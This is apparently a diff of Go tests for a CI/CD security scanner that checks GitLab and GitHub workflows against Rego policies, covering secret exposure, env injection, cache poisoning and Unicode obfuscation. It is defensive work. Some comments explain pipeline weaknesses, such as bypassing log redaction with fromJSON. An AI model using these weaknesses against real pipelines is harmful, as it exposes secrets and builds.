+// job, the policy must emit a single finding.
+func TestIssue412_OneFindingPerJob(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ Services: []ir.Image{
+ {Name: "docker", Tag: "27-dind"},
+ {Name: "docker", Tag: "dind"},
+ },
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ count := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-412" {
+ count++
+ }
+ }
+ if count != 1 {
+ t.Fatalf("expected exactly 1 ISSUE-412 finding, got %d", count)
+ }
+}
+
+// TestIssue203_TruthyAndCaseInsensitive locks in legacy parity:
+// - Variable name comparison is case-insensitive (`ci_debug_trace`
+// matches `CI_DEBUG_TRACE`).
+// - Truthy values are `true`, `1`, `yes` (case-insensitive,
+// trimmed).
+// - When forbiddenVariables is empty / cfg absent, no findings fire
+// (the legacy GetConf path skips the control).
+func TestIssue203_TruthyAndCaseInsensitive(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "debugTrace": map[string]any{
+ "forbiddenVariables": []string{"CI_DEBUG_TRACE"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "lower", Variables: map[string]string{"ci_debug_trace": "true"}},
+ {Name: "one", Variables: map[string]string{"CI_DEBUG_TRACE": "1"}},
+ {Name: "yes-padded", Variables: map[string]string{"CI_DEBUG_TRACE": " YES "}},
+ {Name: "off", Variables: map[string]string{"CI_DEBUG_TRACE": "false"}},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-203" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"lower", "one", "yes-padded"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+
+ // No cfg β no findings (legacy parity: control is skipped when
+ // forbiddenVariables is empty / unset).
+ noCfg, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate (no cfg): %v", err)
+ }
+ for _, f := range noCfg {
+ if f.Code == "ISSUE-203" {
+ t.Fatalf("expected no ISSUE-203 findings without cfg, got %+v", f)
+ }
+ }
+}
+
+// TestIssue101_VarNotationAndUnknownRegistry locks in two legacy
+// parity guarantees:
+// - `${VAR}` and `$VAR` notations normalize to the same form before
+// glob matching, so a pattern written either way matches a
+// reference written the other way.
+// - The "unknown" registry literal emitted by the GitLab image
+// collector is treated as no registry, so the trustedUrls glob
+// compares against just `name:tag`.
+func TestIssue101_VarNotationAndUnknownRegistry(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ t.Run("var_notation_normalised", func(t *testing.T) {
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"registry.company.com/${PROJECT}/*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ // Reference written with $PROJECT (no braces) β must still match.
+ Image: &ir.Image{Name: "$PROJECT/app", Tag: "1.0", Registry: "registry.company.com"},
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ t.Fatalf("expected match after var-notation normalisation, got finding %+v", f)
+ }
+ }
+ })
+
+ t.Run("unknown_registry_treated_as_no_registry", func(t *testing.T) {
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"local-image:*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ Image: &ir.Image{Name: "local-image", Tag: "1.0", Registry: "unknown"},
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ t.Fatalf("expected unknown-registry image to match `local-image:*` glob, got %+v", f)
+ }
+ }
+ })
+}
+
// policyCase pairs a GitLab fixture file with the job names expected
// to be flagged by the policy under test. A nil expectedJobHits means
// the fixture must produce no findings for that issue code.
type policyCase struct {
	file            string   // fixture filename under testdata/<code>/gitlab/
	expectedJobHits []string // job names expected in findings (order-insensitive)
}
+
// runGitLabPolicyCases is a shared test harness for policies exercised
// via GitLab .gitlab-ci.yml fixtures under testdata/<code>/gitlab/.
// Each fixture is parsed into the normalized IR, evaluated against the
// embedded policy bundle, and the jobs flagged with the given issue
// code are compared order-insensitively with the case's
// expectedJobHits. cfg (optional) is passed as input.config; pass nil
// for policies that need no configuration.
func runGitLabPolicyCases(t *testing.T, code string, cases []policyCase, cfg map[string]any) {
	t.Helper()
	engine := opaengine.New()
	if err := engine.LoadFromFS(policies.FS); err != nil {
		t.Fatalf("load embedded policies: %v", err)
	}
	dir := filepath.Join("testdata", code, "gitlab")
	for _, c := range cases {
		t.Run(c.file, func(t *testing.T) {
			data, err := os.ReadFile(filepath.Join(dir, c.file))
			if err != nil {
				t.Fatalf("read fixture: %v", err)
			}
			pipeline := parseGitLabCI(t, data)
			findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
			if err != nil {
				t.Fatalf("evaluate: %v", err)
			}
			// Keep only findings for the policy under test.
			hits := make([]string, 0)
			for _, f := range findings {
				if f.Code != code {
					continue
				}
				hits = append(hits, f.Job)
			}
			// Sort both sides so the comparison ignores emission order.
			sort.Strings(hits)
			expected := append([]string(nil), c.expectedJobHits...)
			sort.Strings(expected)
			if !stringSlicesEqual(hits, expected) {
				t.Fatalf("%s/%s: expected %v, got %v", code, c.file, expected, hits)
			}
		})
	}
}
+
// stringSlicesEqual reports whether a and b contain the same elements
// in the same order. A nil slice and an empty slice compare equal.
func stringSlicesEqual(a, b []string) bool {
	if len(a) != len(b) {
		return false
	}
	for i, v := range a {
		if v != b[i] {
			return false
		}
	}
	return true
}
+
+// TestIssue408_ComponentMissing flags DNF groups whose required
+// components are missing from the resolved include list. The Go
+// control behaviour is to emit one finding per missing component per
+// group — the Rego port does the same.
+func TestIssue408_ComponentMissing(t *testing.T) {
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	// Two requirement groups: the first needs sast AND
+	// secret-detection, the second needs full-security.
+	cfg := map[string]any{
+		"pipelineMustIncludeComponent": map[string]any{
+			"requiredGroups": []any{
+				[]any{"components/sast/sast", "components/secret-detection/secret-detection"},
+				[]any{"your-org/full-security/full-security"},
+			},
+		},
+	}
+	// Only the sast component is actually included, so the other two
+	// required components should each produce a finding.
+	pipeline := &ir.NormalizedPipeline{
+		Provider: ir.ProviderGitLab,
+		Includes: []ir.Include{
+			{Kind: "component", Source: "gitlab.example.com/components/sast/sast@1.0.0", Path: "components/sast/sast"},
+		},
+	}
+	findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+	if err != nil {
+		t.Fatalf("evaluate: %v", err)
+	}
+	// ISSUE-408 findings carry the missing component path in f.Job.
+	hits := map[string]bool{}
+	for _, f := range findings {
+		if f.Code == "ISSUE-408" {
+			hits[f.Job] = true
+		}
+	}
+	if !hits["components/secret-detection/secret-detection"] {
+		t.Fatalf("expected secret-detection flagged, got %v", hits)
+	}
+	if !hits["your-org/full-security/full-security"] {
+		t.Fatalf("expected full-security flagged, got %v", hits)
+	}
+	if hits["components/sast/sast"] {
+		t.Fatalf("unexpected flag on present component: %v", hits)
+	}
+}
+
+// TestIssue409_ComponentOverridden flags required components whose
+// jobs were overridden with forbidden CI/CD keys.
+func TestIssue409_ComponentOverridden(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeComponent": map[string]any{
+ "requiredGroups": []any{
+ []any{"components/sast/sast"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {
+ Kind: "component",
+ Source: "gitlab.example.com/components/sast/sast@1.0.0",
+ Path: "components/sast/sast",
+ OverriddenJobs: []ir.OverriddenJob{
+ {Name: "sast", Keys: []string{"script", "rules"}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-409" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-409 finding, got %d", hits)
+ }
+}
+
+// TestIssue405_TemplateMissing flags DNF groups whose required
+// templates are missing. Template includes (project/remote/local/
+// template) are considered; components and hardcoded origins are
+// ignored.
+func TestIssue405_TemplateMissing(t *testing.T) {
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	// One group requiring both the go and trivy templates.
+	cfg := map[string]any{
+		"pipelineMustIncludeTemplate": map[string]any{
+			"requiredGroups": []any{
+				[]any{"templates/go/go", "templates/trivy/trivy"},
+			},
+		},
+	}
+	pipeline := &ir.NormalizedPipeline{
+		Provider: ir.ProviderGitLab,
+		Includes: []ir.Include{
+			// Carries the template's logical path in AltPath, so it
+			// should satisfy the templates/go/go requirement.
+			{Kind: "project", Source: "group/templates/templates/go/go.yml", Path: "group/templates/templates/go/go.yml", AltPath: "templates/go/go"},
+			// a component should NOT satisfy a template requirement
+			{Kind: "component", Source: "gitlab.example.com/components/trivy/trivy@1.0.0", Path: "components/trivy/trivy"},
+		},
+	}
+	findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+	if err != nil {
+		t.Fatalf("evaluate: %v", err)
+	}
+	// ISSUE-405 findings carry the missing template path in f.Job.
+	hits := map[string]bool{}
+	for _, f := range findings {
+		if f.Code == "ISSUE-405" {
+			hits[f.Job] = true
+		}
+	}
+	if !hits["templates/trivy/trivy"] {
+		t.Fatalf("expected trivy template flagged, got %v", hits)
+	}
+	if hits["templates/go/go"] {
+		t.Fatalf("unexpected flag on present template: %v", hits)
+	}
+}
+
+// TestIssue406_TemplateOverridden flags required templates whose
+// jobs were overridden locally.
+func TestIssue406_TemplateOverridden(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeTemplate": map[string]any{
+ "requiredGroups": []any{
+ []any{"templates/go/go"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {
+ Kind: "project",
+ Source: "group/templates/templates/go/go.yml",
+ Path: "group/templates/templates/go/go.yml",
+ AltPath: "templates/go/go",
+ OverriddenJobs: []ir.OverriddenJob{
+ {Name: "build", Keys: []string{"script"}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-406" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-406 finding, got %d", hits)
+ }
+}
+
+// parseGitHubStepsUses extracts `steps[].uses` entries from a workflow
+// job. Only `uses` is needed for the currently ported policies; the
+// accompanying `with:` block is left empty since no rule reads it yet.
+func parseGitHubStepsUses(v any) []ir.Action {
+	steps, ok := v.([]any)
+	if !ok {
+		return nil
+	}
+	actions := make([]ir.Action, 0, len(steps))
+	for _, raw := range steps {
+		step, ok := toStringMap(raw)
+		if !ok {
+			continue
+		}
+		// Steps without a non-empty `uses:` (e.g. plain run: steps)
+		// contribute nothing.
+		if uses, ok := step["uses"].(string); ok && uses != "" {
+			actions = append(actions, ir.Action{Uses: uses})
+		}
+	}
+	return actions
+}
+
+// TestIssue302_SecretsInherit flags reusable-workflow calls that
+// forward every caller secret via `secrets: inherit`. Explicit
+// per-secret mappings and regular (non-reusable) jobs stay silent.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// stage/scan/evaluate/compare sequence was a line-for-line copy of
+// that harness.
+func TestIssue302_SecretsInherit(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-302", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_inherit.yml", []string{"violation_inherit/call"}},
+		{"clean_named.yml", nil},
+		{"clean_regular_job.yml", nil},
+	})
+}
+
+// TestIssue301_OverprovisionedSecrets flags jobs that serialise the
+// entire `secrets` context via toJson/toJSON and pass it into a
+// step's script, env binding, or action `with:` input. The scoped
+// pattern `${{ secrets.NAME }}` stays silent.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// harness body was identical to it.
+func TestIssue301_OverprovisionedSecrets(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-301", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_env.yml", []string{"violation_env/call"}},
+		{"violation_run_script.yml", []string{"violation_run_script/dump"}},
+		{"violation_with.yml", []string{"violation_with/deploy"}},
+		{"clean_scoped.yml", nil},
+	})
+}
+
+// TestIssue209_GitHubEnvInjection flags `run:` steps that write a
+// user-controlled GitHub template expression into $GITHUB_ENV or
+// $GITHUB_PATH. The env-binding pattern (bind through env: then
+// dereference the shell variable on the redirect line) must stay
+// silent — it is the canonical remediation.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// harness body was identical to it.
+func TestIssue209_GitHubEnvInjection(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-209", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_event_to_env.yml", []string{"violation_event_to_env/build"}},
+		{"violation_head_ref_to_path.yml", []string{"violation_head_ref_to_path/deploy"}},
+		{"clean_env_binding.yml", nil},
+		{"clean_literal.yml", nil},
+	})
+}
+
+// TestIssue105_ContainerHardcodedCredentials flags
+// jobs.<id>.container.credentials.password literals. Template
+// expressions (${{ secrets.X }}) pass through; missing credentials
+// block is a no-op. Exercises the production ScanGitHubWorkflows
+// collector (via runGitHubFixtureCases) so the test covers the full
+// extraction path; the previously inlined harness body was a
+// line-for-line copy of that helper.
+func TestIssue105_ContainerHardcodedCredentials(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-105", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_literal.yml", []string{"violation_literal/build"}},
+		{"clean_secret_ref.yml", nil},
+		{"clean_no_credentials.yml", nil},
+	})
+}
+
+// TestIssue104_ActionUnpinned flags third-party GitHub Actions
+// references that use mutable refs (tags, branches) instead of
+// commit SHAs. Exercises the opt-in config, trusted-owners
+// exemption, and SHA/local exemptions.
+func TestIssue104_ActionUnpinned(t *testing.T) {
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	dir := filepath.Join("testdata", "ISSUE-104", "github")
+	cases := []struct {
+		fixture   string
+		cfg       map[string]any
+		wantCount int
+	}{
+		// Enabled with an empty settings block — presumably the
+		// fixture carries three mutable refs, hence 3 findings.
+		{"violation_tag_ref.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{}}, 3},
+		// Everything pinned by 40-char SHA: nothing to flag.
+		{"clean_sha_pinned.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{}}, 0},
+		// trustedOwners exempts actions/* and github/*; presumably one
+		// third-party tag ref remains in the fixture — hence 1.
+		{"trusted_owner_tag.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{"trustedOwners": []any{"actions", "github"}}}, 1},
+		// No config at all: the policy stays silent (opt-in at the
+		// engine level; .plumber.yaml supplies the default config).
+		{"violation_tag_ref.yml", nil, 0},
+	}
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			data, err := os.ReadFile(filepath.Join(dir, tc.fixture))
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			pipeline := parseGitHubActions(t, data)
+			findings, err := engine.Evaluate(context.Background(), pipeline, tc.cfg)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+			hits := 0
+			for _, f := range findings {
+				if f.Code == "ISSUE-104" {
+					hits++
+				}
+			}
+			if hits != tc.wantCount {
+				t.Fatalf("%s cfg=%v: expected %d ISSUE-104, got %d", tc.fixture, tc.cfg, tc.wantCount, hits)
+			}
+		})
+	}
+}
+
+// TestIssue210_BotConditions flags workflows that gate behaviour on
+// spoofable identity fields (github.actor, sender.login, etc.).
+// Branch/ref conditions stay silent.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// harness body was identical to it.
+func TestIssue210_BotConditions(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-210", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_actor_dependabot.yml", []string{"violation_actor_dependabot/merge"}},
+		{"violation_sender_login.yml", []string{"violation_sender_login/label"}},
+		{"clean_branch_condition.yml", nil},
+	})
+}
+
+// TestIssue303_UnredactedSecrets flags workflows that deserialise a
+// secret via fromJSON and project one of its fields — the fresh
+// string bypasses GitHub's log redaction.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// harness body was identical to it.
+func TestIssue303_UnredactedSecrets(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-303", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_env.yml", []string{"violation_env/deploy"}},
+		{"violation_run.yml", []string{"violation_run/notify"}},
+		{"clean_scoped.yml", nil},
+	})
+}
+
+// TestIssue106_CachePoisoning flags release/publish workflows that
+// restore a build cache without a release-ref-scoped key. A plain CI
+// workflow or a release workflow with the ref woven into the cache
+// key stays silent.
+//
+// Delegates to runGitHubFixtureCases; the previously inlined
+// harness body was identical to it.
+func TestIssue106_CachePoisoning(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-106", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_release_unkeyed.yml", []string{"violation_release_unkeyed/publish"}},
+		{"violation_publish_action.yml", []string{"violation_publish_action/build"}},
+		{"clean_release_scoped_key.yml", nil},
+		{"clean_ci_no_publish.yml", nil},
+	})
+}
+
+// TestIssue601_AnonymousDefinition flags workflow files without a
+// top-level `name:`. One finding per file (not per job).
+func TestIssue601_AnonymousDefinition(t *testing.T) {
+ cases := []struct {
+ fixture string
+ wantCount int
+ }{
+ {"violation_unnamed.yml", 1},
+ {"clean_named.yml", 0},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-601", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-601" {
+ hits++
+ }
+ }
+ if hits != tc.wantCount {
+ t.Fatalf("%s: expected %d, got %d", tc.fixture, tc.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue602_MissingConcurrency flags workflow files with no
+// concurrency block at either workflow or job level.
+func TestIssue602_MissingConcurrency(t *testing.T) {
+	cases := []struct {
+		fixture   string
+		wantCount int
+	}{
+		// No concurrency anywhere: one finding for the file.
+		{"violation_no_concurrency.yml", 1},
+		// A concurrency block at either level silences the rule.
+		{"clean_workflow_concurrency.yml", 0},
+		{"clean_job_concurrency.yml", 0},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			// Stage the fixture into a throwaway repo layout so the
+			// production collector picks it up.
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-602", "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+			hits := 0
+			for _, f := range findings {
+				if f.Code == "ISSUE-602" {
+					hits++
+				}
+			}
+			if hits != tc.wantCount {
+				t.Fatalf("%s: expected %d, got %d", tc.fixture, tc.wantCount, hits)
+			}
+		})
+	}
+}
+
+// TestIssue211_UnsoundCondition flags tautology / contradiction
+// patterns inside `if:` expressions.
+func TestIssue211_UnsoundCondition(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-211", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_tautology.yml", []string{"violation_tautology/deploy"}},
+		{"violation_contradiction.yml", []string{"violation_contradiction/build"}},
+		{"clean_normal_check.yml", nil},
+	})
+}
+
+// TestIssue212_UnsoundContains flags inverted contains() calls.
+func TestIssue212_UnsoundContains(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-212", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_inverted.yml", []string{"violation_inverted/deploy"}},
+		{"clean_correct_order.yml", nil},
+		{"clean_fromJSON_set.yml", nil},
+	})
+}
+
+// runGitHubFixtureCases drives a list of (fixture, expected jobs)
+// cases through ScanGitHubWorkflows + the embedded policies, then
+// asserts the set of job names hit by the given issue code matches.
+// Each fixture is staged into a throwaway .github/workflows tree so
+// the production collector — not a test-only parser — extracts the
+// pipeline. Evaluation runs with a nil config (policy defaults).
+func runGitHubFixtureCases(t *testing.T, code string, cases []struct {
+	fixture      string
+	expectedHits []string
+},
+) {
+	t.Helper()
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", code, "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+			// Keep only the issue code under test; compare as sets.
+			hits := make([]string, 0)
+			for _, f := range findings {
+				if f.Code != code {
+					continue
+				}
+				hits = append(hits, f.Job)
+			}
+			sort.Strings(hits)
+			expected := append([]string(nil), tc.expectedHits...)
+			sort.Strings(expected)
+			if !stringSlicesEqual(hits, expected) {
+				t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+			}
+		})
+	}
+}
+
+// TestIssue603_WorkflowMisfeature flags upload-artifact of the
+// whole checkout directory (leaks .git/).
+func TestIssue603_WorkflowMisfeature(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-603", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_dot.yml", []string{"violation_dot/build"}},
+		{"violation_workspace.yml", []string{"violation_workspace/build"}},
+		{"clean_scoped_path.yml", nil},
+	})
+}
+
+// TestIssue604_WorkflowObfuscation flags zero-width / bidi Unicode
+// inside scripts, env, or action with: inputs.
+func TestIssue604_WorkflowObfuscation(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-604", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_zero_width.yml", []string{"violation_zero_width/deploy"}},
+		{"clean.yml", nil},
+	})
+}
+
+// TestIssue605_UseTrustedPublishing flags publish steps that carry a
+// static token rather than OIDC.
+func TestIssue605_UseTrustedPublishing(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-605", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_pypi_static.yml", []string{"violation_pypi_static/publish"}},
+		{"clean_oidc.yml", nil},
+	})
+}
+
+// TestIssue606_DependabotInsecureExec flags a dependabot.yml that
+// re-enables insecure-external-code-execution on an ecosystem.
+func TestIssue606_DependabotInsecureExec(t *testing.T) {
+ type tc struct {
+ fixture string
+ wantCount int
+ }
+ cases := []tc{
+ {"violation_allow.yml", 1},
+ {"clean.yml", 0},
+ }
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, c := range cases {
+ t.Run(c.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ ghDir := filepath.Join(tmp, ".github")
+ if err := os.MkdirAll(filepath.Join(tmp, ".github", "workflows"), 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-606", "github", c.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(ghDir, "dependabot.yml"), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ // Minimal workflow to give the scanner something to look at.
+ minimal := []byte("name: x\non: [push]\njobs:\n x:\n runs-on: ubuntu-latest\n steps:\n - run: echo x\n")
+ if err := os.WriteFile(filepath.Join(tmp, ".github", "workflows", "w.yml"), minimal, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-606" {
+ hits++
+ }
+ }
+ if hits != c.wantCount {
+ t.Fatalf("%s: expected %d, got %d", c.fixture, c.wantCount, hits)
+ }
+ })
+ }
+}
+
+// TestIssue304_UndocumentedPermissions flags jobs that run with no
+// explicit permissions: block at either level.
+func TestIssue304_UndocumentedPermissions(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-304", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_no_perms.yml", []string{"violation_no_perms/build"}},
+		{"clean_workflow_perms.yml", nil},
+		{"clean_job_perms.yml", nil},
+	})
+}
+
+// TestIssue305_SecretsOutsideEnv flags deploy/publish jobs that use
+// secrets without an environment: gate. Plain CI jobs reading a
+// secret stay silent.
+func TestIssue305_SecretsOutsideEnv(t *testing.T) {
+	runGitHubFixtureCases(t, "ISSUE-305", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"violation_release.yml", []string{"violation_release/publish"}},
+		{"clean_with_env.yml", nil},
+		{"clean_ci_with_secret.yml", nil},
+	})
+}
+
+// TestIssue607_DependabotMissingCooldown flags dependabot ecosystems
+// with no cooldown window.
+func TestIssue607_DependabotMissingCooldown(t *testing.T) {
+	type tc struct {
+		fixture   string
+		wantCount int
+	}
+	cases := []tc{
+		// 2 findings — presumably one per ecosystem declared without
+		// cooldown in the fixture; TODO confirm against the fixture.
+		{"violation_no_cooldown.yml", 2},
+		{"clean_with_cooldown.yml", 0},
+	}
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+	for _, c := range cases {
+		t.Run(c.fixture, func(t *testing.T) {
+			tmp := t.TempDir()
+			if err := os.MkdirAll(filepath.Join(tmp, ".github", "workflows"), 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-607", "github", c.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			// The fixture plays the role of the repo's dependabot
